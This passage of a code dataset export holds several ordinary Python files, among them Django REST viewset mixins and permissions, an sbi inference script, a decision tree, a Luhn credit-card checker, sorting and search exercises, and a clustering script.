MultiNestedCreateModelMixin(mixins.CreateModelMixin, MultiNestedMixinHelper):\n    def create(self, request, *args, **kwargs):\n        serializer = self.get_serializer(data=request.data)\n        serializer.is_valid(raise_exception=True)\n        self.perform_create(serializer)\n        headers = self.get_success_headers(serializer.data)\n        return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)\n\n    def perform_create(self, serializer):\n        filter_dict = self.get_multi_nested_filter(self, {}, 20)\n        serializer.save(**filter_dict)\n\n\nclass MultiNestedUpdateModelMixin(MultiNestedMixinHelper):\n    def update(self, request, *args, **kwargs):\n        partial = kwargs.pop('partial', False)\n        filter_dict = self.get_multi_nested_filter(self, {}, 20)\n        pk = kwargs.get('pk', None)\n        if pk is not None:\n            filter_dict.update({'pk': pk})\n        instance = self.filter_queryset(self.get_queryset().filter(**filter_dict))\n        if len(instance) < 1:\n            raise Http404\n        serializer = self.get_serializer(instance[0], data=request.data, partial=partial)\n        serializer.is_valid(raise_exception=True)\n        self.perform_update(serializer)\n        return Response(serializer.data)\n\n    def perform_update(self, serializer):\n        serializer.save()\n\n    def partial_update(self, request, *args, **kwargs):\n        kwargs['partial'] = True\n        return self.update(request, *args, **kwargs)\n\n\nclass MultiNestedListModelMixin(MultiNestedMixinHelper):\n    def list(self, request, *args, **kwargs):\n        filter_dict = self.get_multi_nested_filter(self, {}, 20)\n        queryset = self.filter_queryset(self.get_queryset().filter(**filter_dict))\n\n        page = self.paginate_queryset(queryset)\n        if page is not None:\n            serializer = self.get_serializer(page, many=True)\n            return self.get_paginated_response(serializer.data)\n\n        serializer = self.get_serializer(queryset, many=True)\n        return Response(serializer.data)\n\n\nclass MultiNestedModelViewSet(MultiNestedCreateModelMixin,\n                              mixins.RetrieveModelMixin,\n                              MultiNestedUpdateModelMixin,\n                              MultiNestedListModelMixin,\n                              mixins.DestroyModelMixin,\n                              GenericViewSet):\n    pass","sub_path":"common/viewsets.py","file_name":"viewsets.py","file_ext":"py","file_size_in_byte":3371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"327463926","text":"import torch\nimport sbi.utils as utils\n\nfrom sbi.inference import SNPE, prepare_for_sbi, SNLE, SNRE\n\nimport time\n\nimport pickle\nfrom multiprocessing import 
cpu_count\nimport subprocess as sp\nimport os\n\nsim_iterations=10000 #3 minimum\nsim_method=\"SNPE\" #SNPE, SNLE, SNRE\nuse_CUDA=False\nobserve=True\nsave_posterior=False\nshutdown=False\n\ndef get_gpu_memory():\n    _output_to_list = lambda x: x.decode('ascii').split('\\n')[:-1]\n\n    #ACCEPTABLE_AVAILABLE_MEMORY = 1024\n    COMMAND = \"nvidia-smi --query-gpu=memory.free --format=csv\"\n    memory_free_info = _output_to_list(sp.check_output(COMMAND.split()))[1:]\n    memory_free_values = [int(x.split()[0]) for i, x in enumerate(memory_free_info)]\n    print(memory_free_values)\n    return memory_free_values\n\ndef pickler(path,obj):\n    outfile = open(path,'wb')\n    pickle.dump(obj,outfile)\n    outfile.close()\n    print(path+\" pickled\")\n\n# parameter distributions [low, high]; kept at module level so the observation\n# step below can still use them when a pickled posterior is loaded from disk\ndist_vals={\"m\": [-100., 100.],\n           \"c\": [-100., 100.]\n           }\n\ndef line(m,c=0.):\n    x=torch.arange(-100.,100.,0.1)\n    return m*x+c\n\nif use_CUDA==True:\n    torch.set_default_tensor_type('torch.cuda.FloatTensor')\n    device=\"gpu\"\nelse:\n    device=\"cpu\"\n\n\nposterior_path=\"posteriors/posterior{}_{}.pkl\".format(sim_iterations,sim_method)\ntry:\n    infile = open(posterior_path,'rb')\n    posterior = pickle.load(infile)\n    infile.close()\n    print(\"Posterior Loaded - \"+posterior_path)\n\nexcept FileNotFoundError:\n\n    print(posterior_path+\" not found.\\nGenerating posterior\")\n\n    start=time.time()\n    sim_timer=[]\n\n    dist_lows=torch.tensor([float(dist_vals[i][0]) for i in dist_vals])\n    dist_highs=torch.tensor([float(dist_vals[i][1]) for i in dist_vals])\n\n    prior = utils.BoxUniform(low=dist_lows, high=dist_highs)\n    # print(prior.sample())\n\n    # sim_counter=-1 # 2 runs occur during setup\n\n    def simulator(parameter_set): #links parameters to simulation data\n        # global sim_timer, sim_counter\n\n        # sim_counter+=1\n        # startx=time.time()\n\n        m=float(parameter_set[0])\n        c=float(parameter_set[1])\n\n        # sim_timer.append(time.time()-startx)\n\n        if use_CUDA==True:\n            get_gpu_memory()\n\n        return line(m,c)#parameter_set\n\n    try:\n        threads=cpu_count()\n    except NotImplementedError:\n        threads=1\n\n    simulator, prior = prepare_for_sbi(simulator, prior)\n\n    if sim_method==\"SNPE\":\n        inference = SNPE(simulator, prior, density_estimator='mdn', num_workers=threads, device=device)\n    elif sim_method==\"SNLE\":\n        inference = SNLE(simulator, prior, density_estimator='mdn', num_workers=threads, device=device)\n    elif sim_method==\"SNRE\":\n        inference = SNRE(simulator, prior, num_workers=threads, device=device)\n\n    posterior = inference(num_simulations=sim_iterations, proposal=None)\n\n    print(\"\\nTraining Duration = {}s\".format(round(time.time()-start,2)))\n#    print(\"Total Simulation Time = {}s\".format(round(sum(sim_timer),2)))\n\n    if save_posterior==True:\n        pickler(posterior_path,posterior)\n\nif observe==True:\n    observation=line(15.2,32.5)\n    # print(observation.size())\n    # observation=torch.zeros(1440)\n    print(observation)\n    samples = posterior.sample((10000,), x=observation)#,sample_with_mcmc=True)\n    #print(samples)\n    # print(\"-----------------------------------------\")\n    log_probability = posterior.log_prob(samples, x=observation,norm_posterior=False)\n    #print(len(log_probability))\n\n    labels=[i for i in dist_vals]\n    _ = utils.pairplot(samples, limits=None, fig_size=(6,6), labels=labels)\nprint(\"\\a\")\n\nif shutdown==True:\n    time.sleep(60)\n    os.system(\"shutdown\")
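\n# usage sketch (illustrative, assuming save_posterior was True above): the pickled\n# posterior can be reloaded in a later session and queried for a new observation, e.g.\n#   with open(posterior_path, 'rb') as f:\n#       posterior = pickle.load(f)\n#   samples = posterior.sample((1000,), x=line(15.2, 32.5))\n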
","sub_path":"line_test/line_inference.py","file_name":"line_inference.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"139803202","text":"# fit_grapher.py\n\nimport re\nimport sys\nimport datetime\nimport gspread\nimport matplotlib.pyplot as plt\nfrom oauth2client.service_account import ServiceAccountCredentials\n\n\ndef graphData(workout, d1, d2):\n\n plt.plot(d1, d2, '-bo')\n \n plt.xlabel(workout)\n plt.ylabel('Weight')\n \n plt.title(workout)\n plt.show()\n\ndef getSheet(sheet_name):\n\n # use creds to create a client to interact with the Google Drive API\n scope = ['https://www.googleapis.com/auth/drive']\n creds = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', scope)\n client = gspread.authorize(creds)\n\n # Find a workbook by name and open the first sheet\n # Make sure you use the right name here.\n sheet = client.open(sheet_name).sheet1\n\n return sheet\n\ndef getData(sheet, criteria):\n \n crit = re.compile(criteria)\n\n dates = []\n workouts = []\n for c in sheet.findall(crit):\n\n date = sheet.cell(c.row, c.col-1).value\n workout = re.search(criteria + \"\\(\\d{,3},\\s*\\d{1},\\s*\\d{1,2}\\)\", str(c)).group(0)\n \n weight = int(workout[workout.find(\"(\")+1 : workout.find(\",\")])\n dates.append(date)\n workouts.append(weight)\n \n if not dates and not workouts:\n return None\n\n return (dates, workouts)\n\nif __name__ == \"__main__\":\n\n if len(sys.argv) == 1:\n print(\"Error: Arg empty\")\n else:\n sheet = getSheet(\"Fitness Log\")\n data = getData(sheet, sys.argv[1])\n\n if data is not None:\n graphData(sys.argv[1], data[0], data[1])\n else:\n print(\"Error: Exercise \\\"\", sys.argv[1], \"\\\" not found.\" )\n ","sub_path":"fit_grapher.py","file_name":"fit_grapher.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"629666969","text":"import json\nimport os\nimport pickle\n\nimport lmdb\nimport numpy as np\nfrom PIL import Image\n\nfrom ..utils.stream import ItemFeature\nfrom .base_reader import IMIXDataReader\n\n\nclass HatefulMemesReader(IMIXDataReader):\n\n def __init__(self, cfg):\n self.init_default_params(cfg)\n self.image_dir = cfg.image_dir\n self.imsize = cfg.img_size\n splits = cfg.datasets\n if isinstance(splits, str):\n splits = [splits]\n self.splits = splits\n self.mix_features_pathes = {split: cfg['mix_features'][split] for split in self.splits}\n self.mix_annotations_pathes = {split: cfg['mix_annotations'][split] for split in self.splits}\n\n self.idx_split_index = []\n self.annotations = []\n for split, mix_annotations_path in self.mix_annotations_pathes.items():\n annotations_tmp = self._load_jsonl(mix_annotations_path)\n self.annotations.extend(annotations_tmp)\n self.idx_split_index.extend([split] * len(annotations_tmp))\n self.feature_txns = list(\n set(\n list({\n split: lmdb.open(self.mix_features_pathes[split]).begin()\n for split in list(self.mix_features_pathes.keys())\n }.values())))\n\n self.annotations = [\n ann for ann in self.annotations if self.get_featureinfo_from_txns(self.feature_txns, ann['id']) is not None\n ]\n\n def __len__(self):\n return len(self.annotations)\n\n def __getitem__(self, item):\n annotation = self.annotations[item]\n img_name = annotation['img'].split('/')[-1]\n img_id = annotation['id']\n label = annotation['label']\n text = annotation['text']\n img = self.load_image(img_name)\n features_info = 
self.get_featureinfo_from_txns(self.feature_txns, img_id)\n\n        item_dict = {}\n        item_dict.update(features_info)\n        item_dict.update({\n            'img_name': img_name,\n            'img_id': img_id,\n            'label': label,\n            'text': text,\n            'img': img,\n        })\n\n        return ItemFeature(item_dict)\n\n    def _load_jsonl(self, annotation_path):\n        with open(annotation_path, 'r') as f:\n            vs = [json.loads(s) for s in f]\n        return vs\n\n    def get_featureinfo_from_txns(self, txns, key):\n        feature_info = None\n        key = str(key)\n        for txn in txns:\n            feature_info = txn.get(key.encode())\n            if feature_info is not None:\n                break\n        return None if feature_info is None else pickle.loads(feature_info)\n\n    def load_image(self, img_name):\n        return np.array(\n            Image.open(os.path.join(self.image_dir, img_name)).convert('RGB').resize((self.imsize, self.imsize)))\n","sub_path":"imix/data/reader/hatefulmemes_reader.py","file_name":"hatefulmemes_reader.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"585142344","text":"import cv2\r\nimport numpy as np\r\nimport re\r\nfrom matplotlib import pyplot as plt\r\nfrom sklearn.neural_network import MLPClassifier\r\n\r\n\r\nlista_archivos = open('img_list_trainer.txt','r')\r\ncontador = 0\r\nfor linea in lista_archivos:\r\n    if contador==0:\r\n        datos_imagenes = np.load(linea.rstrip())\r\n    else:\r\n        sample_actual = np.load(linea.rstrip())\r\n        datos_imagenes = np.vstack((datos_imagenes,sample_actual))\r\n    contador = contador+1\r\nlista_archivos.close()\r\n\r\nnp.savetxt(\"patrones.csv\", datos_imagenes , delimiter=\",\")\r\n\r\nn_samples, n_first_layer = datos_imagenes.shape\r\netiquetas_imagenes = np.zeros((n_samples,))\r\nind = 0\r\nlista_etiquetas = open('img_label_trainer.txt','r')\r\nfor linea in lista_etiquetas:\r\n    etiquetas_imagenes[ind] = float(linea.rstrip())\r\n    ind = ind+1\r\n\r\nlista_etiquetas.close()\r\n\r\nnp.savetxt(\"etiquetas.csv\", etiquetas_imagenes , delimiter=\",\")\r\n","sub_path":"empaquetizador2.py","file_name":"empaquetizador2.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"106252279","text":"# AMEX 15 digits, starts with 34 or 37\n# VISA 13 & 16 digits, starts with a 4\n# MASTER CARD 16 digits, starts with 51-55\n\nfrom cs50 import get_string\n# get credit card number from user\nwhile True:\n    card = get_string(\"Number: \")\n    if card.isdigit() == True:\n        break\nlength = len(card)\n\n# convert numbers (format: string) into a list of chars\nstr_card = list(card)\n\n# reverse the order\nstr_card.reverse()\n\n# format list of chars into a list of ints\nnumbers = []\nfor i in str_card:\n    numbers.append(int(i))\n\n# starting from the second element double every other element\ndigits = []\nfor j in range(1, length, 2):\n    digits.append(2 * numbers[j])\n\n# create new list of other digits\ndigits_other = []\nfor k in range(0, length, 2):\n    digits_other.append(numbers[k])\n\n# convert list of ints into a list of chars\nstr_digits = []\nfor k in digits:\n    str_digits.append(str(k))\n\n# convert list of chars into a full string\nstring = ''.join(str_digits)\n\n# calculate checksum\nchecksum = sum(int(l) for l in string) + sum(digits_other)\n\n# if checksum is valid, check length and starting digits to determine card type\nif checksum % 10 == 0:\n    if length in (13, 16) and card[0] == '4':\n        print(\"VISA\")\n    elif length == 15 and card[0] + card[1] in (\"34\", \"37\"):\n        print(\"AMEX\")\n    elif length == 16 and card[0] + card[1] in (\"51\", \"52\", \"53\", \"54\", \"55\"):\n        print(\"MASTERCARD\")\n    else:\n        print(\"INVALID\")\n# if checksum is invalid, print invalid\nelse:\n    print(\"INVALID\")\n","sub_path":"pset6/credit/credit.py","file_name":"credit.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"277436730","text":"'''\n    Create a function named count_first_letter that takes a\n    dictionary named names as a parameter. names should be a\n    dictionary where the key is a last name and the value\n    is a list of first names.\n    The function should return a new dictionary where each key\n    is the first letter of a last name, and the value is the number\n    of people whose last name begins with that letter.\n'''\n\n# Write your count_first_letter function here:\ndef count_first_letter(names):\n    dict = {}\n    for key in names:\n        init = key[0]\n        if init in dict:\n            dict[init] += len(names[key])\n        else:\n            dict[init] = len(names[key])\n    return dict\n\n# Uncomment these function calls to test your function:\nprint(count_first_letter({\"Stark\": [\"Ned\", \"Robb\", \"Sansa\"], \"Snow\" : [\"Jon\"], \"Lannister\": [\"Jaime\", \"Cersei\", \"Tywin\"]}))\n# should print {\"S\": 4, \"L\": 3}\nprint(count_first_letter({\"Stark\": [\"Ned\", \"Robb\", \"Sansa\"], \"Snow\" : [\"Jon\"], \"Sannister\": [\"Jaime\", \"Cersei\", \"Tywin\"]}))\n# should print {\"S\": 7}","sub_path":"count_first_letter.py","file_name":"count_first_letter.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"280419238","text":"def num_swap(j):\r\n    tmp = numbers[j+1]\r\n    numbers[j+1] = numbers[j]\r\n    numbers[j] = tmp\r\n\r\n\r\ndef sort_list(numbers):\r\n    i = 1\r\n    while i < len(numbers):\r\n        j = 0\r\n        while j <= (len(numbers) - 2):\r\n            if numbers[j] > numbers[j+1]:\r\n                num_swap(j)\r\n            j += 1\r\n        i += 1\r\n\r\n\r\nnumbers = []\r\nlength = int(input(\"Type in the length of the list: \"))\r\n\r\nfor i in range(length):\r\n    numbers.append(int(input(\"Enter a number: \")))\r\n\r\nprint(\"Initial order of numbers: \", numbers)\r\n\r\nsort_list(numbers)\r\nprint(\"Sorted order of numbers: \", numbers)\r\n","sub_path":"Week 1/Algorithmfromflowchart2.py","file_name":"Algorithmfromflowchart2.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"418186972","text":"import numpy as np\n\nclass DecisionTree:\n    def __init__(self, max_depth=7,min_size=3):\n        self.max_depth = max_depth\n        self.min_size = min_size\n\n    def fit(self,X,y):\n        dataset = np.column_stack([X,y])\n        self.tree = self.__build_tree(dataset)\n\n    def predict(self,X):\n        if len(X.shape) == 1:\n            return self.__predict_one(self.tree,X)\n        else:\n            y_pred = []\n            for x in X:\n                y_pred.append(self.__predict_one(self.tree,x))\n            return y_pred\n\n    def print_tree(self, node, depth=0):\n        if isinstance(node, dict):\n            print('%s[X%d < %.3f]' % ((depth * ' ', (node['index'] + 1), node['value'])))\n            self.print_tree(node['left'], depth + 1)\n            self.print_tree(node['right'], depth + 1)\n        else:\n            print('%s[%s]' % ((depth * ' ', node)))\n\n    def __gini_index(self,groups,classes):\n        n_instanse = float(sum([ len(group) for group in groups ]))\n        gini = 0.0\n        for group in groups:\n            size = float(len(group))\n            if size == 0:\n                continue\n            score = 0.0\n            for class_val in classes:\n                p = [row[-1] for row in group].count(class_val)/size\n                score +=p*p\n            gini +=(1.0 - 
score)*(size/n_instanse)\n        return gini\n\n    def __test_split(self,index, value, dataset):\n        left, right = [],[]\n        for row in dataset:\n            if row[index] < value:\n                left.append(row)\n            else:\n                right.append(row)\n        return left, right\n\n    def __to_terminal(self, group):\n        # a leaf predicts the most common class in its group\n        outcomes = [row[-1] for row in group]\n        return max(set(outcomes), key=outcomes.count)\n\n    def __get_split(self, dataset):\n        # exhaustive search over features and observed values for the lowest-Gini split\n        class_values = list(set(row[-1] for row in dataset))\n        b_index, b_value, b_score, b_groups = 999, 999, 999, None\n        for index in range(len(dataset[0]) - 1):\n            for row in dataset:\n                groups = self.__test_split(index, row[index], dataset)\n                gini = self.__gini_index(groups, class_values)\n                if gini < b_score:\n                    b_index, b_value, b_score, b_groups = index, row[index], gini, groups\n        return {'index': b_index, 'value': b_value, 'groups': b_groups}\n\n    def __split(self, node, depth):\n        max_depth, min_size = self.max_depth, self.min_size\n        left, right = node['groups']\n        del(node['groups'])\n        if not left or not right:\n            node['left'] = node['right'] = self.__to_terminal(left + right)\n            return\n        if depth >= max_depth:\n            node['left'], node['right'] = self.__to_terminal(left), self.__to_terminal(right)\n            return\n\n        if len(left) <= min_size:\n            node['left'] = self.__to_terminal(left)\n        else:\n            node['left'] = self.__get_split(left)\n            self.__split(node['left'], depth + 1)\n\n        if len(right) <= min_size:\n            node['right'] = self.__to_terminal(right)\n        else:\n            node['right'] = self.__get_split(right)\n            self.__split(node['right'], depth + 1)\n\n    def __build_tree(self,train):\n        root = self.__get_split(train)\n        self.__split(root,1)\n        return root\n\n\n    def __predict_one(self,node,row):\n        if row[node['index']] < node['value']:\n            if isinstance(node['left'], dict):\n                return self.__predict_one(node['left'], row)\n            else:\n                return node['left']\n        else:\n            if isinstance(node['right'], dict):\n                return self.__predict_one(node['right'], row)\n            else:\n                return node['right']\n\n\nif __name__ == '__main__':\n    dt = DecisionTree()\n\n    dataset = np.array([[2.771244718, 1.784783929, 0],\n                        [1.728571309, 1.169761413, 0],\n                        [3.678319846, 2.81281357, 0],\n                        [3.961043357, 2.61995032, 0],\n                        [2.999208922, 2.209014212, 0],\n                        [7.497545867, 3.162953546, 1],\n                        [9.00220326, 3.339047188, 1],\n                        [7.444542326, 0.476683375, 1],\n                        [10.12493903, 3.234550982, 1],\n                        [6.642287351, 3.319983761, 1]])\n    tree = dt.fit(dataset[:,:-1],dataset[:,-1])\n    #dt.print_tree(tree)\n    print(dt.predict(dataset[:,:-1]))","sub_path":"ClassificationAlgorithms_TimeSeriesPredict/modules/decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"199770403","text":"# MIT 6.034 Lab 0: Getting Started\n# Written by Jessica Noss (jmn), Dylan Holmes (dxh), and past 6.034 staff\n\nfrom point_api import Point\n\n# This is a multiple choice question. You answer by replacing\n# the symbol 'None' with a letter, corresponding to your answer.\n\n# What version of Python do we *recommend* (not \"require\") for this course?\n# A. Python v2.3\n# B. Python v2.5, Python v2.6, or Python v2.7\n# C. Python v3.0\n# Fill in your answer in the next line of code (\"A\", \"B\", or \"C\"):\n\nANSWER_1 = \"B\"\n\n\n#### Warm-up: Exponentiation ###################################################\n\ndef cube(x):\n    \"\"\"Given a number x, returns its cube (x^3)\"\"\"\n    return x**3\n\n\n#### Recursion #################################################################\n\ndef fibonacci(n):\n    \"\"\"Given a positive int n, uses recursion to return the nth Fibonacci number.\"\"\"\n    if n==0 or n==1:\n        return n\n    else:\n        return fibonacci(n-1)+fibonacci(n-2)\n\n\ndef expression_depth(expr):\n    if not isinstance(expr, (list,tuple)):\n        return 0\n    else:\n        return max([expression_depth(sub_expr) for sub_expr in expr])+1\n\n\n#### Built-in data types #######################################################\n\ndef compute_string_properties(string):\n    \"\"\"Given a string of lowercase letters, returns a tuple containing the\n    following three elements:\n    0. The length of the string\n    1. A list of all the characters in the string (including duplicates, if\n    any), sorted in REVERSE alphabetical order\n    2. 
The number of distinct characters in the string (hint: use a set)\n \"\"\"\n \n a = []\n \n thing = []\n for i in string:\n thing.append(i)\n thing = sorted(thing, reverse = True)\n \n thing2 = len(list(set(string)))\n a.append(len(string))\n a.append(thing)\n a.append(thing2)\n a = tuple(a)\n return a\n \n\ndef tally_letters(string):\n \n dic= {}\n for i in string:\n if i not in dic:\n dic[i] = 1\n else:\n dic[i] +=1\n return dic\n \n \n\n\n#### Functions that return functions ###########################################\n\ndef create_multiplier_function(m):\n \"Given a multiplier m, returns a function that multiplies its input by m.\"\n def function(a):\n return a*m\n return function\n\n\n#### Objects and APIs: Copying and modifing objects ##########################\n\ndef get_neighbors(point):\n \"\"\"Given a 2D point (represented as a Point object), returns a list of the\n four points that neighbor it in the four coordinate directions. Uses the\n \"copy\" method to avoid modifying the original point.\"\"\"\n \n return [point.copy().setX(point.getX()+1).setY(point.getY()),point.copy().setX(point.getX()-1).setY(point.getY()),point.copy().setX(point.getX()).setY(point.getY()+1),point.copy().setX(point.getX()).setY(point.getY()-1)]\n \n \n\n\n#### Using the \"key\" argument ##################################################\n\ndef sort_points_by_Y(list_of_points):\n \"\"\"Given a list of 2D points (represented as Point objects), uses \"sorted\"\n with the \"key\" argument to create and return a list of the points sorted in\n increasing order based on their Y coordinates, without modifying the\n original list.\"\"\"\n my_sorting_function = lambda p: p.copy().getY()\n return sorted(list_of_points, key=my_sorting_function)\n \n\ndef furthest_right_point(list_of_points):\n \"\"\"Given a list of 2D points (represented as Point objects), uses \"max\" with\n the \"key\" argument to return the point that is furthest to the right (that\n is, the point with the largest X coordinate).\"\"\"\n my_finding_function = lambda p: p.copy().getX()\n return max(list_of_points, key= my_finding_function)\n\n\n#### SURVEY ####################################################################\n\n# How much programming experience do you have, in any language?\n# A. No experience (never programmed before this semester)\n# B. Beginner (just started learning to program, e.g. took one programming class)\n# C. Intermediate (have written programs for a couple classes/projects)\n# D. Proficient (have been programming for multiple years, or wrote programs for many classes/projects)\n# E. Expert (could teach a class on programming, either in a specific language or in general)\n\nPROGRAMMING_EXPERIENCE = \"C\" #type a letter (A, B, C, D, E) between the quotes\n\n\n# How much experience do you have with Python?\n# A. No experience (never used Python before this semester)\n# B. Beginner (just started learning, e.g. took 6.0001)\n# C. Intermediate (have used Python in a couple classes/projects)\n# D. Proficient (have used Python for multiple years or in many classes/projects)\n# E. 
Expert (could teach a class on Python)\n\nPYTHON_EXPERIENCE = \"C\"\n\n\n# Finally, the following questions will appear at the end of every lab.\n# The first three are required in order to receive full credit for your lab.\n\nNAME = \"Tugsbayasgalan Manlaibaatar\"\nCOLLABORATORS = \"\"\nHOW_MANY_HOURS_THIS_LAB_TOOK = 1\nSUGGESTIONS = None #optional\n","sub_path":"6.034-2016/lab0/lab0.py","file_name":"lab0.py","file_ext":"py","file_size_in_byte":5171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"458135173","text":"from rest_framework.permissions import DjangoModelPermissions\nfrom rest_framework import exceptions\nimport logging\nlogger = logging.getLogger(__name__)\n\n\nclass LCoreDjangoModelPermissions(DjangoModelPermissions):\n def __init__(self):\n super(LCoreDjangoModelPermissions, self).__init__()\n\n perms_map = {\n # 'GET': ['%(app_label)s.change_%(model_name)s','%(app_label)s.view_%(model_name)s','%(app_label)s.view_self_%(model_name)s'],\n 'GET': ['%(app_label)s.view_%(model_name)s','%(app_label)s.view_self_%(model_name)s'],\n 'OPTIONS': [],\n 'HEAD': [],\n 'POST': ['%(app_label)s.add_%(model_name)s'],\n 'PUT': ['%(app_label)s.change_%(model_name)s','%(app_label)s.change_self_%(model_name)s'],\n 'PATCH': ['%(app_label)s.change_%(model_name)s','%(app_label)s.change_self_%(model_name)s'],\n 'DELETE': ['%(app_label)s.delete_%(model_name)s','%(app_label)s.delete_self_%(model_name)s'],\n }\n\n authenticated_users_only = True\n\n def get_required_permissions(self, method, model_cls):\n \"\"\"\n Given a model and an HTTP method, return the list of permission\n codes that the user is required to have.\n \"\"\"\n kwargs = {\n 'app_label': model_cls._meta.app_label,\n 'model_name': model_cls._meta.model_name\n }\n\n if method not in self.perms_map:\n raise exceptions.MethodNotAllowed(method)\n req_perms = [perm % kwargs for perm in self.perms_map[method]]\n logger.debug('required_permissions: %()s',req_perms)\n return req_perms\n\n def _queryset(self, view):\n assert hasattr(view, 'get_queryset') \\\n or getattr(view, 'queryset', None) is not None, (\n 'Cannot apply {} on a view that does not set '\n '`.queryset` or have a `.get_queryset()` method.'\n ).format(self.__class__.__name__)\n\n if hasattr(view, 'get_queryset'):\n queryset = view.get_queryset()\n assert queryset is not None, (\n '{}.get_queryset() returned None'.format(view.__class__.__name__)\n )\n return queryset\n return view.queryset\n\n def has_perms(self, perm_list, user,obj=None):\n \"\"\"\n Return True if the user has each of the specified permissions. 
If\n object is passed, check if the user has all required perms for it.\n \"\"\"\n return any(user.has_perm(perm, obj) for perm in perm_list)\n\n def ignore_permission_method(self,request):\n ignore_permission_methods = [key for key,value in self.perms_map.items() if not value]\n if request.method in ignore_permission_methods:\n return True\n\n\n def has_permission(self, request, view):\n # Workaround to ensure DjangoModelPermissions are not applied\n # to the root view when using DefaultRouter.\n if getattr(view, '_ignore_model_permissions', False):\n return True\n\n if not request.user or (\n not request.user.is_authenticated and self.authenticated_users_only):\n return False\n\n if self.ignore_permission_method(request):\n return True\n\n queryset = self._queryset(view)\n perms = self.get_required_permissions(request.method, queryset.model)\n logger.info('requred permissions permissions :%s',perms)\n\n\n return self.has_perms(perms,request.user)\n\n\n\nclass SelfOnlyPermissions(LCoreDjangoModelPermissions):\n perms_map = {\n 'GET': ['%(app_label)s.view_self_%(model_name)s'],\n 'OPTIONS': [],\n 'HEAD': [],\n 'POST': ['%(app_label)s.add_%(model_name)s'],\n 'PUT': ['%(app_label)s.change_self_%(model_name)s'],\n 'PATCH': ['%(app_label)s.change_self_%(model_name)s'],\n 'DELETE': ['%(app_label)s.delete_self_%(model_name)s'],\n }\n def has_perms(self, perm_list, user,obj=None):\n \"\"\"\n Return True if the user has each of the specified permissions. If\n object is passed, check if the user has all required perms for it.\n \"\"\"\n print('SelfOnlyPermissions')\n print(perm_list)\n print(user.get_all_permissions())\n return all(user.has_perm(perm, obj) for perm in perm_list)","sub_path":"apps/l_core/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":4220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"402705406","text":"\ndef search(arr, key):\n left = -1\n right = len(arr)\n while left < right - 1:\n mid = (left + right) // 2\n if arr[mid] < key:\n left = mid\n else:\n right = mid\n if right == len(arr):\n return -1\n if arr[right] == key:\n return right\n else:\n return -1\n\n\ncount = input()\narr = input().split()\nb = input().split()\nfor i in range(len(arr)):\n arr[i] = int(arr[i])\n\nfor i in b:\n i = int(i)\n if i < arr[-1]:\n if search(arr, i) != -1:\n print(\"YES\")\n else:\n print(\"NO\")\n else:\n print(\"NO\")\n\n\n\n","sub_path":"71.py","file_name":"71.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"586242331","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Aug 28 09:40:42 2020\r\n\r\n@author: Grant\r\n\"\"\"\r\n\r\ntraining_data = [[[0, 1]], [[1, 1]], [[2, 2]], [[2, 1]], [[1, 2]], [[5, 5]], [[5, 6]], [[6, 6]], [[6, 7]], [[3, 11]], [[4, 12]], [[3, 12]]]\r\n\r\ndef distance(set_1, set_2):\r\n distance_matrix = []\r\n for s1 in set_1:\r\n for s2 in set_2:\r\n temp = []\r\n d = ((s1[0] - s2[0])**2 + (s1[1] - s2[1])**2)**(1/2)\r\n temp.append(s1)\r\n temp.append(s2)\r\n temp.append(d)\r\n distance_matrix.append(temp)\r\n distance_matrix.sort(key=lambda x: x[2])\r\n return distance_matrix[0][2]\r\n\r\ndendogram = [[0], [1], [2], [3], [4], [5], [6], [7], [8], [9], [10], [11]]\r\n\r\nwhile len(training_data) > 1:\r\n single_linkage_matrix = []\r\n for i in range(len(training_data)):\r\n for j in range(len(training_data)):\r\n if i == j:\r\n continue\r\n \r\n temp = []\r\n d = 
distance(training_data[i], training_data[j])\r\n                temp.append(i)\r\n                temp.append(j)\r\n                temp.append(d)\r\n\r\n                single_linkage_matrix.append(temp)\r\n\r\n    single_linkage_matrix.sort(key = lambda x: x[2])\r\n\r\n    chosen_point_i = single_linkage_matrix[0][0]\r\n    chosen_point_j = single_linkage_matrix[0][1]\r\n\r\n    dendogram[chosen_point_i].append(dendogram[chosen_point_j])\r\n    dendogram.pop(chosen_point_j)\r\n\r\n    for x in range(len(training_data[chosen_point_j])):\r\n        element = training_data[chosen_point_j][x]\r\n        training_data[chosen_point_i].append(element)\r\n\r\n    training_data.pop(chosen_point_j)\r\n\r\nprint(dendogram)\r\n","sub_path":"Linkage Algorithms.py","file_name":"Linkage Algorithms.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
